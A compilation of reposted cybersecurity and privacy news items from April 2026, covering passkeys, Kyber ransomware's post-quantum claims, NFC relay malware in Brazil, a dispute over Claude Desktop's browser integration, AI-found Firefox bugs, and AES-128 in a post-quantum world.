HD Moore, a hacker with more than four decades of experience and the founder and CEO of runZero, said that user-developed repository workflows, such as GitHub actions, are notorious for hosting vulnerabilities.

It’s a “a major problem for open source projects with open repos,” he said. “It’s really hard to not accidentally create dangerous workflows that can be exploited by an attacker’s pull request.”

He said this package can be used to check for such vulnerabilities.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Tuesday 28 April 2026 at 12:49 pm AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

GCHQ’s National Cyber Security Centre (NCSC) has just updated its guidance. It is now recommending that consumers should pick passkeys, rather than passwords, as their first login choice across all digital services. The decision was announced on Thursday, and it is notable because the NCSC is the UK government's technical authority on cyber security.

The recommendation is a change from last year when the NCSC stopped short of endorsing adoption due to some key implementation challenges. Thanks to progress made since then, it is now recommending the technology to the public as a more secure and user-friendly login method. It also calls on businesses to use it as the default authentication option to offer to consumers.

Commenting on passkeys, Jonathan Ellison, Director of National Resilience at NCSC, said:

“Adopting passkeys wherever you can is a strong step towards a safer, simpler login experience and I am pleased that we can now support uptake.

The headaches that remembering passwords have caused us for decades no longer need to be a part of logging in where users migrate to passkeys – they are a user-friendly alternative which provide stronger overall resilience.

As we aim to accelerate the UK’s cyber defences at scale, moving to passkeys is something all of us can do to improve the security of everyday digital services and be prepared for modern and future cyber threats.”

While passkeys may be stronger for the general public, they’re simply not as common as passwords yet, and likely won’t be for a very long time. For those websites that don’t support passkeys yet, the advice is to use a password manager to create a strong password and to use two-factor authentication.

The UK government said last year that it would roll out passkeys for its digital services as an alternative to SMS-based verification. It expects this to save millions of pounds annually.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Monday 27 April 2026 at 3:40 pm AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

The Proton team has released the spring and summer roadmap for their password manager, Proton Pass, bringing several improvements, like folders and a new SSH agent, among others.

Starting with folders, Proton says this feature will "require some rethinking of our cryptography model" and expects it to be available in the coming months. When it launches, you will be able to organize your credentials and notes into dedicated folders and even subfolders, and then share those specific folders just like you already can with individual items or entire vaults.

Last June, Proton rolled out support for Custom Items, allowing users to create specific templates for storing unique data formats such as Wi-Fi network credentials, passports, licenses, and, of course, SSH keys.

Now, Proton says it is working on an SSH agent that lets you use those SSH keys already stored in your vault for your actual Git and terminal workflows. This feature will bring it up to par with more established password managers like 1Password and Bitwarden, which developers have used for this exact purpose for some time. The goal is to let you authenticate SSH sessions or sign Git commits using a simple biometric prompt from the desktop app, keeping the private keys off your local disk.

The Proton Pass extension is getting support for biometric unlock, using your computer's fingerprint sensor or Face ID. The initial rollout will be limited to macOS and Chromium-based browsers, with support for more platforms and browsers to follow later. Other updates Proton is making to the extension include adding iFrame autofill support to handle login forms embedded on complicated sites, like banking portals, and a full offline mode.

Since its launch in mid-2023, Proton has been aggressively pushing updates to Proton Pass. Throughout 2024 and 2025, the password manager got neat features like full passkey support, dedicated desktop apps for Windows, macOS, and Linux, the Pass Monitor security dashboard, Secure Links for sharing with non-users, encrypted file attachments, custom item types, and even a command-line interface.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Saturday 25 April 2026 at 7:50 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

A relatively new ransomware family is using a novel approach to hype the strength of the encryption used to scramble files—making, or at least claiming, that it is protected against attacks by quantum computers.

Kyber, as the ransomware is called, has been around since at least last September and quickly attracted attention for the claim that it used ML-KEM, short for Module Lattice-based Key Encapsulation Mechanism and is a standard shepherded by the National Institute of Standards and Technology. The Kyber ransomware name comes from the alternate name for ML-KEM, which is also Kyber. For the rest of the article, Kyber refers to the ransomware; the algorithm is referred to as ML-KEM.

It’s all about marketing

ML-KEM is an asymmetric encryption method for exchanging keys. It involves problems based on lattices, a structure in mathematics that quantum computers have no advantage in solving over classic computing. ML-KEM is designed to replace Elliptic Curve and RSA cryptosystems, both of which are based on problems that quantum computers with sufficient strength can tackle.

On Tuesday, security firm Rapid7 said it reverse-engineered Kyber and found that the Windows variant used ML-KEM1024, the highest strength version of the PQC (post-quantum cryptography) standard. Kyber was using ML-KEM to conceal the key used to encrypt victims’ data with AES-256, a symmetric cryptographic standard that is also quantum-proof. (As reported previously, AES-128 would have sufficed in withstanding a quantum attack.) Brett Callow, a threat analyst at security firm Emsisoft, said it’s the first confirmed case of ransomware using PQC.

There is no practical benefit for Kyber developers to have chosen a PQC key-exchange algorithm. The Kyber ransom note gives victims one week to respond. Quantum computers capable of running Shor’s algorithm—the series of mathematical equations that allow the breakage of RSA and ECC (elliptic curve cryptography)—are, at a minimum, three years away and likely much further.

A Kyber variant that targets systems running VMware,  meanwhile, claims to use ML-KEM as well. Rapid7 said its look under the hood revealed that, in fact, it uses RSA with 4096-bit keys, a strength that will take even longer for Shor’s algorithm to break. Anna Širokova, a Rapid7 senior security researcher and the author of Tuesday’s post, said the use or claimed use of ML-KEM is likely just a branding gimmick and that implementing it required relatively little work by Kyber developers.

In an email, Širokova wrote:

First, it’s marketing to the victim. “Post-quantum encryption” sounds a lot scarier than “we used AES,” especially to non-technical decision-makers who might be evaluating whether to pay. It’s a psychological trick. They’re not worried about someone breaking the encryption a decade from now. They want payment within 72 hours.

 

Second, implementation cost is low. Kyber1024 libraries (renamed to ML-KEM) are available and well-documented. Ransomware doesn’t encrypt your files directly with Kyber1024. That would be slow. Instead, it:

 

1. Generates a random AES key
2. Encrypts your files with that AES key (fast)
3. Encrypts that AES key with Kyber1024 (so only the attacker can decrypt it)

 

In Rust, there are already libraries that do Kyber1024. The developer just adds it to their dependencies and calls a function to wrap the key.

Despite the hype, Kyber suggests that PQC is attracting the attention of less technically inclined attorneys and executives deciding how to respond to ransom demands. Kyber developers are hoping the impression that the encryption has overwhelming strength will sway people to pay.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Friday 24 April 2026 at 4:10 pm AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

In a world where bad actors are increasingly adopting sophisticated techniques to deploy malicious attacks, including general artificial intelligence to unsuspecting users, it feels like a no-brainer to have some kind of antivirus installed on your device.

Having an antivirus installed helps protect you against malware, phishing attacks, and ransomware that can give hackers unauthorized access to sensitive data. Luckily, Microsoft ships Windows 11 with Microsoft Defender as an in-box app to help curb such issues and provide users with real-time protection and advanced features designed to keep their system secure.

“For many Windows 11 users, Microsoft Defender Antivirus covers everyday risk without requiring additional software,” Microsoft indicated in a Learning Center article earlier this month (via Windows Latest). This seems to have been fuelled by users going the extra mile to install third-party antivirus software on their devices to handle the same task.

Microsoft's response to skeptics questioning Defender's capabilities is simple and clear: “Windows antivirus protection is usually sufficient when Windows 11 runs with default protections enabled, updates are installed regularly, and software downloads are deliberate.”

However, the tech giant hasn't completely written off the value of third-party antivirus software, especially depending on how you use your Windows PC and the features you value.

Why not run multiple antivirus programs on your Windows PC, including Microsoft Defender? The company warned that it may cause system conflicts and stress your device's resources.

Microsoft also warned users against over-reliance on third-party antivirus software, citing that “each added tool increases background activity and complexity, so choose tools that match real needs.” As expected, the company used the opportunity to toot its own horn, highlighting the benefits of using Microsoft Defender as your default antivirus in Windows 11, including anti-phishing and ransomware protection.

I did some brief groundwork to see what the community thinks about Microsoft Defender in Windows 11. In the r/Windows11 subreddit on Reddit, a user asked whether they'll need a third-party antivirus or if Microsoft Defender would suffice

Everyone in the comment section pretty much said the same thing: Microsoft Defender is enough and works just fine. "I haven't used a 3rd party antivirus since XP," a user indicated. "Windows Defender is enough and maybe even too much," another user added.

Do you use Microsoft Defender on Windows 11? Let me know in the comments.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Thursday 23 April 2026 at 7:35 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

A campaign in November 2025, which targeted Android users in Brazil, is still active and rising at an alarming rate. ESET researchers have discovered a new variant of the NGate malware family that uses a trojanized version of the HandyPay application to steal NFC payment data of Android users. Research suggests that the source code for the malware was written using a GenAI.

The threat actors are mainly targeting Android users in Brazil. This was found while analyzing the attackers' C&C server. This is done with the trojanized app widely circulated through a fake website impersonating a Brazilian lottery, "Rio de Prêmios", as well as through a fake Google Play page. When asked about this to HandyPay, they confirmed that an internal investigation is ongoing on their side.

Code snippet - Image via ESEST

A massive use of GenAI is used to develop malware. As seen in the above code snippet, the malware logs contain emojis, which are generally seen in AI-generated texts. This suggests that LLMs were used to modify or generate the code, although there is no conclusive proof.

Image via ESET

The start of the attack is done through the lottery page, where the victim clicks on the 'Button to claim prize' and installs the trojanized HandyPay apk. Once installed, the apk behaves as the original application, which makes it difficult for the user to detect anything unusual. The user is then asked to enter the PIN of the card into the app and tap the card at the back of the smartphone with NFC enabled. While in the background, the malware collects the victim's payment information and card data and relays it to the hacker. With this done, the threat actor can use this relayed data to perform contactless transactions as well as withdraw cash from the ATM.

While explaining, ESET said, "The operator’s device is linked to an email address hardcoded within the malicious app, ensuring that all captured NFC traffic is routed exclusively to the attacker. We have observed two different attacker email addresses being used in the analyzed samples. On top of the standard batch of data that is transferred in the NFC relay, the victim’s payment card PIN is exfiltrated separately to a dedicated C&C server over HTTP, not relying on HandyPay infrastructure. The C&C endpoint for PIN harvesting also functions as the distribution server, centralizing both delivery and data-collection operations".

Over the growing use of NFC payments, experts warn to be wary of such attacks and install applications from official sources. The use of Generative AI also triggers the idea that a person without technical expertise is bound to hack into payment systems.

Source

One app should not modify another app without asking for and receiving your explicit consent. Yet Anthropic's Claude Desktop for macOS installs files that affect other vendors' applications without disclosure, even before those applications have been installed, and authorizes browser extensions without consent.

Alexander Hanff, a privacy consultant and occasional contributor to The Register, contends this makes Claude Desktop "spyware" and amounts to a violation of European privacy law.

"I want to be blunt," Hanff wrote in a blog post over the weekend. "This is a dark pattern. It is also, in my professional opinion, a direct breach of Article 5(3) of Directive 2002/58/EC (the ePrivacy Directive) as well as a multitude of computer access and misuse laws (usually criminal law), on a scale large enough to matter, in a vendor which has spent considerable effort on being perceived as the safety conscious AI lab."

Article 5(3) requires service providers seeking access to a person's data to provide clear details about the data access request and to obtain consent unless access is strictly necessary to provide the service.

Hanff explains that he found the undisclosed file installation while trying to debug another application that used Native Messaging, an API for communicating between Chrome and other applications. Claude Desktop relies on the cross-platform Electron framework, which in turn relies on a bundled version of Chromium.

The file that Claude Desktop installed was:

com.anthropic.claude_browser_extension.json

It's a Native Messaging manifest file that gets called when Chromium-based browsers want to run a local executable. The file pre-authorizes three different Chrome extension identifiers (e.g. Claude in Chrome extension) so that associated browsers will run the binary identified in the manifest file.

Basically, Claude Desktop is setting up its AI model's ability to access various browsers for automated operation. And it does this for browsers not yet present on the user's device, so that those browsers will grant Claude access if they are installed at some point in the future.

But Hanff claims he never installed any Anthropic browser extensions due to privacy and security concerns. Claude Desktop did so for him, without disclosure or permission.

Browser extensions magnify security and privacy challenges because they often request overly broad permissions. Hanff observes that Claude in Chrome has authenticated session access and can read web pages, fill out forms, and capture the screen. What's more, he says, the binary bridge application runs outside of the browser's sandbox at user privilege level, without surfacing any permission prompts.

Anthropic's approach has numerous problems, according to Hanff. It amounts to forced bundling across trust boundaries by writing configuration files for other vendors' browsers. It's invisible by default, with no opt-in. It's difficult to remove. It pre-authorizes browser extensions that haven't been installed. Its file is named in a way that fails to clarify the scope of what is being allowed. And it pre-authorizes non-present browsers to use the Native Messaging binary, among other concerns.

Hanff says, "Anthropic's own safety data states Claude for Chrome is vulnerable to prompt injection at a 23.6 percent success rate without mitigations, and 11.2 percent with their current mitigations. … With the bridge pre-installed on the user's laptop, a successful prompt injection against Claude for Chrome has a path, through the extension, through the bridge, to a helper binary running outside the browser sandbox at user privilege."

Anthropic did not respond to a request for comment.

We note that the Claude Desktop native messaging host has an unfixed bug that was auto-closed on February 28th by a GitHub Actions bot. The problem is that the Claude Code and Claude Desktop native messaging host registrations conflict with one another, so the associated Chrome extension fails with Claude Code.

Noah M. Kenney, founder and principal consultant for advisory firm Digital 520, takes issue with Hanff's use of the term "spyware" but says his findings appear to support his legal reasoning.

"The technical claims here are largely testable and, as described, reproducible," said Kenney in an email to The Register. "Independent reviewers can verify that identical Native Messaging manifests are written across multiple Chromium-based browser paths, that the activity is attributed at the OS level to the desktop application, and that installation events are recorded in the app's own logs. If those artifacts hold, the core behavior is difficult to dispute: the desktop app is registering a Native Messaging host across multiple browser environments, including ones the user has not actively chosen to integrate, and maintaining that registration persistently."

With the disclaimer that he's not an attorney, Kenney said the legal framing is more complicated.

"Article 5(3) of the ePrivacy Directive clearly applies to storing information on a user's device, so the act of writing these manifests is in scope. The key question is whether that action is 'strictly necessary' for a service the user actually requested. 

"Vendors will argue this is part of a unified product experience, but regulators, particularly in Europe, tend to interpret 'strictly necessary' narrowly. Silently installing cross-application integrations, especially into browsers the user has not opted into, is likely to fall outside that exemption, which carries credible regulatory risk."

Kenney said he would push back on the term "spyware" because it traditionally implies active and covert data exfiltration.

"What is described here is different," he said. "It is a pre-positioned integration layer that remains dormant until triggered by a browser extension, which is an important distinction. Regardless, the risk is still real as this creates a persistent, pre-authorized bridge from browser extensions into a local executable running outside the browser sandbox, installed without clear user awareness and resistant to removal. From a security perspective, that meaningfully expands the attack surface."

Kenney agrees that the way Anthropic has designed its software in this instance breaks a widely understood trust boundary.

"Users do not expect a desktop application to silently modify other applications, especially across vendors," he said. "European regulators, in particular, expect explicit opt-in, installation scoped only to user-selected integrations, and clear persistent controls with real revocation. This implementation falls short of that baseline. European enforcement is moving toward demonstrable, user-visible control rather than implied or deferred consent. Silent system modification across application boundaries is exactly the kind of pattern regulators are increasingly focused on."

Hanff told The Register that Anthropic has yet to respond to his post. He said he hasn't filed a formal complaint but intends to if the company fails to fix the Claude for Desktop installation process.

Kenney said, "Putting the legal ramifications aside, there is substantial reputational damage and loss of user trust that comes from a company that users perceive as being committed to safety and privacy releasing tools that seemingly undercut that posture."

Source

Earlier this month, Anthropic said its Mythos Preview model was so good at finding cybersecurity vulnerabilities that the company was limiting its initial release to “a limited group of critical industry partners.” Since then, debate has raged over whether the model presages an era of turbocharged AI-aided hacking or if Anthropic is just building hype for what is a relatively normal step up on the ladder of advancing AI capabilities.

Mozilla added some important data to that debate Tuesday, writing in a blog post that early access to Mythos Preview had helped it pre-identify 271 security vulnerabilities in this week’s release of Firefox 150. The results were significant enough to get Firefox CTO Bobby Holley to enthuse that, in the never-ending battle between cyberattackers and cyberdefenders, “defenders finally have a chance to win, decisively.”

“We’ve rounded the curve”

Holley didn’t go into detail on the severity of the hundreds of vulnerabilities that Mythos reportedly detected simply by analyzing the unreleased source code of Firefox’s latest version. But by way of comparison, he noted that Anthropic’s Opus 4.6 model found only 22 security-sensitive bugs when analyzing Firefox 148 last month.

The vulnerabilities identified by Mythos could have also been discovered either by automated “fuzzing” techniques or by having an “elite security researcher” reason their way through the browser’s complex source code, Holley writes. But using Mythos eliminated the need to “concentrate many months of costly human effort to find a single bug” in many cases, Holley added.

By identifying bugs so efficiently, Holley writes that AI tools like Mythos tilt the cybersecurity balance toward defenders, who benefit when discovering vulnerabilities becomes cheaper for both sides. “Computers were completely incapable of doing this a few months ago, and now they excel at it,” Holley writes. “We have many years of experience picking apart the work of the world’s best security researchers, and Mythos Preview is every bit as capable.”

In an interview with Wired, Holley said that, from now on, this kind of AI-aided vulnerability analysis is something that “every piece of software is going to have to [engage with], because every piece of software has a lot of bugs buried underneath the surface that are now discoverable.” And while it’s possible that future models more advanced than Mythos may be able to find bugs that current models miss, Holley said he was confident that “at least on the Firefox side, having had a bit of a head start here, that we’ve rounded the curve.”

Running through the AI-aided defense gauntlet could be especially important for the open source projects that underpin much of the modern Internet. That’s both because their public codebases are easier for AI systems to explore for vulnerabilities and because many such projects rely on wildly insufficient volunteer maintenance for their security.

In a New York Times essay last week, Mozilla CTO Raffi Krikorian argued that the human difficulty of both finding bugs and writing complex software has created a kind of balance in cyberthreat research that Mythos could break wide open. “The programmer who gave 20 years of his life to maintain [open source] code that runs inside products used by billions of people? He doesn’t have access to Mythos yet. He should,” Krikorian wrote.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 22 April 2026 at 1:34 pm AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

The UK digital regulator, Ofcom, has launched enforcement action against Telegram after evidence suggested child sexual abuse material (CSAM) was being shared on the platform. The investigation is happening under the Online Safety Act and will look to see whether the platform is meeting its obligations to stop CSAM from being shared.

The regulator also revealed that it was opening investigations into Teen Chat and Chat Avenue to see whether they were meeting their duties to protect children from being groomed by predators.

Under the OSA, platforms facilitating user-to-user services must tackle the sharing of CSAM content. Ofcom said that it works with law enforcement agencies to identify platforms that are being used by offenders to share CSAM. Most recently, it received evidence from the Canadian Centre for Child Protection about the alleged existence and sharing of CSAM on Telegram.

It has decided to launch the investigation on the back of this report. If Ofcom finds the company has broken the law, it can require Telegram to take specific actions to come into compliance. It can also impose fines of 18 million pounds or 10% of qualifying worldwide revenue, whichever is higher. If it continues not to comply, it could ask a court to block Telegram in the UK or require payment providers and advertisers to withdraw their services from the platform.

Commenting on this development, Suzanne Cater, Director of Enforcement at Ofcom, said:

“Child sexual exploitation and abuse causes devastating harm to victims, and making sure sites and apps tackle this is one of our highest priorities. It’s why we work so closely with partners in law enforcement and child protection organisations to identify where these harms are occurring and hold providers to account where they’re failing to meet their obligations.

“Progress has undeniably been made, particularly with file-sharing services, which are too often used to share horrific child sexual abuse imagery. But this problem extends to big platforms too, and teen-focused chat services are too easily being used by predators to groom children. These firms must do more to protect children, or face serious consequences under the Online Safety Act.”

Let us know in the comments whether you use Telegram and what you think the outcome of this investigation will be.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 22 April 2026 at 7:13 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

With growing focus on the existential threat quantum computing poses to some of the most crucial and widely used forms of encryption, cryptography engineer Filippo Valsorda wants to make one thing absolutely clear: Contrary to popular mythology that refuses to die, AES 128 is perfectly fine in a post-quantum world.

AES 128 is the most widely used variety of the Advanced Encryption Standard, a block cipher suite formally adopted by NIST in 2001. While the specification allows 192- and 256-bit key sizes, AES 128 was widely considered to be the preferred one because it meets the sweet spot between computational resources required to use it and the security it offers. With no known vulnerabilities in its 30-year history, a brute-force attack is the only known way to break it. With 2¹²⁸ or 3.4 x 10³⁸ possible key combinations, such an attack would take about 9 billion years using the entire bitcoin mining resources as of 2026.

It boils down to parallelization

Over the past decade, something interesting happened to all that public confidence. Amateur cryptographers and mathematicians twisted a series of equations known as Grover’s algorithm to declare the death of AES 128 once a cryptographically relevant quantum computer (CRQC) came into being. They said a CRQC would halve the effective strength to just 2⁶⁴, a small enough supply that—if true—would allow the same bitcoin mining resources to brute force it in less than a second (the comparison is purely for illustration purposes; a CRQC almost certainly couldn’t run like clusters of bitcoin ASICs and more importantly couldn’t parallelize the workload as the amateurs assume).

On Monday, Valsorda finally channeled years’ worth of frustration, fueled by the widely held misunderstanding, into a blog post titled “Quantum Computers Are Not a Threat to 128-bit Symmetric Keys.”

“There’s a common misconception that quantum computers will ‘halve’ the security of symmetric keys, requiring 256-bit keys for 128 bits of security,” he wrote. “That is not an accurate interpretation of the speedup offered by quantum algorithms, it’s not reflected in any compliance mandate, and risks diverting energy and attention from actually necessary post-quantum transition work.”

That’s the easy part of the argument. The much harder part is the math and physics that explain it. At its highest level, it comes down to a fundamental difference in the way a brute-force search works on classical computers versus the way it works using Grover’s algorithm. Classical computers can perform multiple searches simultaneously, a capability that allows large tasks to be broken into smaller pieces to complete the overall job faster. Grover’s algorithm, by contrast, requires a long-running serial computation, where each search is done one at a time.

“What makes Grover special is that as you parallelize it, its advantage over non-quantum algorithms gets smaller,” Valsorda said in an interview. He continued:

Imagine it with small numbers, let’s say there are 256 possible combinations to a lock, A normal attack would take 256 tries. You decide it’s too long, so you get three friends and you each do 64 tries. “That’s the classical parallelization. With Grover you could in theory do √256)=16 tries in a row, but if that’s still too long and you again look for help from three friends. Each has to do √256/4)=8 tries.

 

So in total you do 8*4=32 tries, which is more than the 16 you would have done alone! Asking for help to parallelize the attack made the attack slower overall. Which is not the case for classical attacks.

 

Of course the numbers are way larger, but if we apply any reasonable constraint on the attacker (like having to finish a run in 10 years), the total work becomes so much more than 2⁶⁴.

 

Also, 2⁶⁴ was never the right number, because that pretends you can do AES as a single operation on a single qubit. This is somewhat orthogonal. The combination of these two observations turn the actual cost into 2¹⁰⁴ give or take, which is well beyond the threshold for security.

Sophie Schmieg, a senior cryptography engineer at Google, explained it this way:

With a normal brute force search, if I interrupt it halfway through, I have roughly a 50% chance of it already being successful. So I can have two computers doing the search, each over 50% of the keys, and be done in half the time. But with Grover’s, if I interrupt halfway through, the probability of getting the correct answer is only 25%. So instead of using two computers on half of the search space, I now need four.

 

So if you look at coreseconds, the classical algorithms cost what they cost, independent of how many computers you use in parallel. You can increase cores and your time goes down by the corresponding amount. But with the quantum algorithm, coreseconds are not independent of the parallelization strategy. Having more cores does not reduce the time by the same amount, to the point that if you went to the maximally parallel instance where each QC has to check only a single key, you need 2¹²⁸ QCs, and not 2⁶⁴, i.e. you’re no better than classical.

Valsorda’s post provides a more mathematically detailed explanation, as does this video.

Valsorda listed a litany of sources that support the assertion that AES is perfectly acceptable in a post-quantum world, including from the National Institute of Standards and Technology (here, here, and here), the German Federal Office for Information Security (here), and Samuel Jaques, an assistant professor in the Department of Combinatorics and Optimization at the University of Waterloo (here).

The exception to these recommendations is spelled out in the NSA’s version 2 of the Commercial National Security Algorithm Suite, which mandates AES 256. Valsorda said requirements for 256-level security were in place even in the predecessor algorithm suite, and weren’t specific to quantum readiness. “As far as I can tell, its intention is to avoid the very same fragmentation introduced by security levels by picking one oversized primitive for all settings.”

He further said 256-bit AES is also warranted in certain cases, such as to avoid the possibility of collisions, in which two keys randomly end up equal because of the birthday paradox.

So the next time you hear someone say quantum computing reduces the security of AES by a factor of two, kindly remind them that’s a superstition that’s distracting engineers from the real and considerable work in preparing the world for the advent of CRQC. It’s a tall enough order updating asymmetric algorithms known to be vulnerable to Shor’s algorithm, which breaks them in polynomial time, specifically cubic time, a massive advantage compared with the exponential time provided by today’s classical computers.

“Conflating necessary and unnecessary changes will cause needless churn and take resources away from the urgent updates,” Valsorda argued. “We’re lucky we can leave the symmetric cryptography (sub-)systems untouched; we should take that blessing and focus on the work that actually needs doing, which is plenty.”

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 22 April 2026 at 7:12 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

Planning a big night out at Madison Square Garden? Have fun—but don’t say we didn’t warn you.

A WIRED investigation this week revealed new details about the private surveillance state instituted by MSG owner Jim Dolan and his head of security, John Eversole.

According to court records and WIRED sources, visitors to the Garden and some other Dolan-owned venues have been subjected to face recognition, social media monitoring, in-person surveillance, and more.

The US government’s warrantless wiretap powers hit a roadblock this week. Despite a push from President Donald Trump for a long-term reauthorization of the so-called Section 702 spy program, 20 Republican lawmakers in the House of Representatives voted against a full reauthorization, forcing Speaker Mike Johnson to merely extend the program for an additional 10 days.

Meta’s Ray-Ban and Oakley AI smartglasses have an image problem—for good reason. More than 70 civil society groups, including the ACLU and the National Organization for Women, sent a letter to the company this week, demanding that it abandon any plans it may have to equip its AI glasses with face-recognition features. The groups argue that including face recognition in the wearable devices, which can already surreptitiously record videos of people, would further erode any semblance of privacy and potentially facilitate stalkers, domestic abusers, and federal agents.

Nonconsensual deepfake nudes are a scourge at schools around the world, according to an analysis by WIRED and Indicator. By tracking publicly reported incidents of deepfake “nudify” tech used against middle- and high-school-aged girls, we were able to identify more than 600 victims in 28 countries around the world.

You might think banning a $20 billion black market for scammers from your platform would be a no-brainer. But not if you’re Telegram. A WIRED investigation found that the messaging app continued to host Xinbi Guarantee despite the UK government’s designating it a facilitator of human trafficking and sanctioning the largest-ever online marketplace of its kind. Crypto-tracing firm Elliptic says that Xinbi carried out another $505 million in transactions in the 19 days after the UK issued its sanction.

The AI race has finally entered the cybersecurity lap. After Anthropic revealed its new model, Mythos, as a unique risk to the security status quo, OpenAI announced that it, too, has a new cybersecurity strategy, and a new model to go with it—GPT-5.4-Cyber.

That’s not all! Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

It Takes 2 Minutes to Hack the EU’s New Age Verification App

The European Commission this week released its free, open source app for verifying the ages of visitors to social networks and pornography websites. At a press conference on Wednesday, European Commission president Ursula von der Leyen proclaimed that, with the release of the app, “there are no more excuses” for platforms that fail to check users’ ages. That, however, was before experts found the app to be a security disaster.

As reported by Politico, security consultant Paul Moore claimed on X to have found a series of security issues with the app that allowed him to hack it “in less than 2 minutes.” The issues include how the app reportedly stores a user-created PIN that could allow an attacker to easily take over that person’s app profile. (Baptiste Robert, a whitehat hacker, confirmed the vulnerability to Politico.) Tagging von der Leyen in his post, Moore concluded, “This product will be the catalyst for an enormous breach at some point. It's just a matter of time.”

A Gym Chain and a Hotel Giant Disclose Major Data Breaches

Europe's largest gym chain, Basic-Fit, confirmed a major data breach on Monday, revealing that the bank details of roughly a million customers were compromised. Around 200,000 members in the Netherlands alone were affected. The stolen data includes bank details along with customers' names, home and email addresses, phone numbers, and dates of birth. A spokesperson told The Register that members in Belgium, France, Germany, Luxembourg, and Spain were also similarly hit through a single system that records member visits to clubs. No passwords, which Basic-Fit says it does not store, were reportedly compromised.

The same day, global travel and hotel reservation giant Booking.com confirmed that hackers may have extracted customer data including names, emails addresses, phone numbers, and booking details. The company informed TechCrunch that it “noticed some suspicious activity” and “took action to contain the issue.” Company notices posted by purported customers on Reddit appear to disclose a breach touching on “anything” the users “may have shared with the accommodation.” TechCrunch reported that Booking.com had declined to share details about the scope of the breach, but did separately tell The Guardian that no “financial information” was lost.

Bluesky Buckles Under DDoS Attack

Bluesky’s site and app struggled through Thursday after what the company confirmed was a distributed denial-of-service attack. Chief operations officer Rose Wang said the “sophisticated” attack began April 15 around 8:40 pm ET and caused intermittent failures across feeds, notifications, and search. The company said it has not seen any evidence of unauthorized access to user data.

The outages hit Bluesky’s own infrastructure but spared communities like Blacksky that run their own instances on the underlying AT Protocol. Blacksky told TechCrunch it has seen a significant spike in migration requests over the past 12 hours, as users and rival ATmosphere operators promote alternatives. As of Friday afternoon, its status page shows the service fully operational.

ICE Offered Jobs to Applicants With Dubious Backgrounds

The Trump administration has been on a hiring spree. A Department of Homeland Security press release from January says that ICE hired over 12,000 officers and agents in less than a year. As part of their job applications, immigration officers are supposed to go through extensive background checks that probe everything from what arrests they might have had, the debts they’ve racked up, and foreign nationals they’ve interacted with in the past seven years. The Associated Press did its own background checks on 40 ICE agents and found three that had faced lawsuits because of alleged misconduct in their previous law enforcement jobs, and several that reportedly faced legal actions because of their histories of unpaid debt. DHS didn’t comment on specific hiring choices, but acknowledged to the AP that it had given some applicants “temporary selection letters” and offers to start working before their full background checks had been completed.

Russian Crypto Exchange Grinex Hacked, Blames Foreign Spies

The Russian cryptocurrency exchange Grinex, widely reported to have aided Russia’s sanctions evasion, abruptly announced Thursday that it would be suspending its operations following a breach that it says allowed a hacker to steal more than a billion rubles’ worth of its users’ funds, equivalent to more than $13 million dollars. In its announcements on its social accounts, Grinex blamed the “special services” of a foreign country, writing that the “digital traces and the nature of the attack indicate an unprecedented level of resources and technologies available exclusively to structures of unfriendly states” and seemed to be aimed at “causing direct damage to Russia's financial sovereignty.” Grinex, which was itself sanctioned by US financial authorities, had served as the successor to Garantex, another Russian exchange that had been sanctioned for enabling sanctions evasion and other alleged financial crimes. According to crypto-tracing firm Elliptic, Grinex was likely created by the same owners and inherited Garantex funds and customers. Grinex didn’t provide any public evidence to back its claim that the theft of its funds was carried out by state-sponsored hackers.

Source

Last year, Neowin reported on a privacy-focused study which examined how various web browsers ensure user privacy. Surprisingly or perhaps unsurprisingly, Google Chrome came out on top as the worst among all, edging out Microsoft's Edge. The two scored 76 and 63, respectively (the higher the score, the worse it is). To be fair to Chrome, Vivaldi was just as bad as Chrome as it scored 75. Mozilla's Firefox however did much better as it put up 50 out of 100. You can view the full scorecard in our dedicated article.

From time to time, however, Google keeps adding features that promise to enhance user privacy. A new report though agrees with the previous study as it suggests that Google Chrome offers "almost no native anti-fingerprinting defences, unlike Brave, Firefox, or Tor." The report investigated the features Google offers on Chrome to protect users against device fingerprinting and browser fingerprinting, among others. Sadly most of it seemed sub-par, leading the author to conclude that Google abandoned its Privacy Sandbox plans and "left us with nothing". Google did have its reasons which you can read about in our coverage.

If you are not aware, browser fingerprinting, similar to one in real life, is unique, and it provides tracking data to browsers that is exclusive to only us and our devices. Hence, it essentially hinders anonymity on the web. It works by generating a unique fingerprint for each user, grabbing data from their OS, GPU, CPU, and other hardware.

The issue is mainly because of how modern browsers have come to be. They are far more than just simple web access tools now as they act as full-fledged platforms that can handle logins, store passwords and PINs, sync data across devices, and track user activity for performance and personalization.

Hence unlike malware which typically raise immediate red flags, browser-level tracking is often built into its core functionality and is dependent on collecting user information. Thus browsers become sort of like a centralized hub of sensitive data by collecting everything from browsing history, session tokens, to saved credentials and device fingerprints, and things can easily go wrong.

And they can go from bad to worse on Chrome as it comes with "canvas, audio, WebGL, fonts and speech synthesis APIs completely unprotected," which means all that unique user data could be accessible to the online world.

